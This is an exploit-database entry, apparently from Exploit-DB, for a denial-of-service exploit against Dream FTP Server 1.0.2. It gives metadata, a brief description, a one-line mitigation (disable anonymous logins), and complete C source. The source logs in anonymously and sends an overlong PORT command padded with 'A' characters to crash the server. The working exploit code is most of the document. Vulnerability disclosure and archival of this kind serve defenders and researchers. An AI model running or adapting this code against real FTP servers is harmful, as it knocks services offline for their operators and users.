DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit

vendor:

Dream FTP Server

by:

InTeL

7,5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Dream FTP Server

Affected Version From: 1.0.2

Affected Version To: 1.0.2

Patch Exists: NO

Related CWE: N/A

CPE: a:dream_ftp:dream_ftp_server:1.0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2008

DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit

Dream FTP v1.02 also has anonymous logins enabled by default which enables anyone to crash the server at will. But if the anonymous logins have been disabled try it with a another user/pass account. The exploit sends an evil buffer of 40 characters to the server, which causes the server to crash.

Mitigation:

Disable anonymous logins and use strong passwords for user accounts.

Source

Exploit-DB raw data:

/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

Dream FTP v1.02 also has anonymous logins enabled by default 
which enables anyone to crash the server at will.
But if the anonymous logins have been disabled try it with 
a another user/pass account

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);


int usage(char *filename)
{
	   printf("Dream FTP v1.02 DoS exploit\r\n");
	   printf("By InTeL\r\n");
	   printf("USAGE: %s <IP_Address> <port>\r\n", filename);

	exit(0);
}

int main(int argc, char *argv[])
{
	char evilbuf[40], recvbuf[1028];
	unsigned short port;
	struct sockaddr_in saddr;
	struct hostent *he;
	WSADATA wsaData;
	SOCKET sock;

	if(argc != 3)
		usage(argv[0]);

	port = atoi(argv[2]);	
	if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
		printf("Unable to initialize Winsock \n");
		exit(1);
	}

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
		printf("Socket Error \n");
		exit(1);
	}

	if ((he = gethostbyname(argv[1])) == NULL){  
		printf("Couldnt Resolve %s \n",argv[1]);
		exit(1);
	}

	memset(&saddr, 0, sizeof(saddr));
	saddr.sin_family = AF_INET;
	saddr.sin_addr = *((struct in_addr *)he->h_addr);	
	saddr.sin_port = htons(port);

	if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR){
		printf("Connect Error \n");
      	exit(1);
	}

	for(int i = 0; i<3;i++){
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
	}
	printf("Logging in\r\n");	

	memset(evilbuf, 0,sizeof(evilbuf));
	strcpy(evilbuf, "USER Anonymous\r\n"); //USER
	send (sock, evilbuf, strlen(evilbuf), 0);
   
	for(i=0;i<4;i++){
		memset(recvbuf,0,sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
   
	memset(evilbuf, 0, sizeof(evilbuf));
	strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
	send (sock, evilbuf, strlen(evilbuf), 0);

	for(i=0; i<3;i++) {
		memset(recvbuf, 0, sizeof(recvbuf));
		recv(sock, recvbuf, 1027, 0);
   	}
	printf("Building overflow string\r\n");

	memset(evilbuf,0,sizeof(evilbuf));
	strcpy(evilbuf, "PORT ");  //PORT 
	for(i = 5;i != 36;i++)
		evilbuf[i] = 'A';
   	strcat(evilbuf,"\r\n");
	
	send (sock, evilbuf, strlen(evilbuf), 0);  
   
	printf("DoS Attack Done\r\n");
	closesocket(sock);

	return 0;
}

// milw0rm.com [2006-12-21]